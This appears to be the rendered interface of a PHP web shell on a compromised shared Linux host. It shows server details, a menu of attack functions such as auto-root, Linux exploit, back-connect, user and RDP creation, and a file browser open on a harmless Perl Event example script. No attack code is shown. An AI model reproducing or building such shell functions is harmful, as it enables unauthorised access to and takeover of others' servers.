Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libevent-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
echo.t
759
B
-rw-r--r--
group.t
571
B
-rw-r--r--
idle2.t
1.2
KB
-rw-r--r--
msg.pm
1016
B
-rw-r--r--
perlqt.t
2.45
KB
-rw-r--r--
process.pm
1.59
KB
-rw-r--r--
queue_pending.t
792
B
-rw-r--r--
rand_interval.t
323
B
-rw-r--r--
readline.t
2.28
KB
-rw-r--r--
repeat.t
1005
B
-rw-r--r--
semaphore.pm
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : repeat.t
#!/usr/bin/perl -w use strict; use Event; # $Event::DebugLevel = 4; my $w=Event->io(fd=>\*STDIN, repeat=>0, cb=>\&callback); Event->timer(interval=>4, cb=>sub { $w->repeat(!$w->repeat); warn "repeat=".$w->repeat."\n"; state($w); }); sub callback { my $w = $_[0]->w; my $h = $w->fd; my $in=<$h>; print "You entered: $in"; if ($in =~ /start|again/) { $w->again; } state($w); } sub state { my ($w)=@_; warn 'Is: '.join(' ', $w->is_active?'ACTIVE':'INACTIVE', $w->is_suspended?'SUSP':'', $w->is_cancelled?'CANCELLED':'')."\n"; } print " This demo shows the function of the repeat flag. If you press return while repeat=1 then the watcher will remain active. If you press return while repeat=0 then the watcher will become inactive. If you type 'again' while the watcher is inactive then again() will be called in the callback and the watcher should continue to be active. Granted, this is not very exciting. :-) "; Event::loop;
Close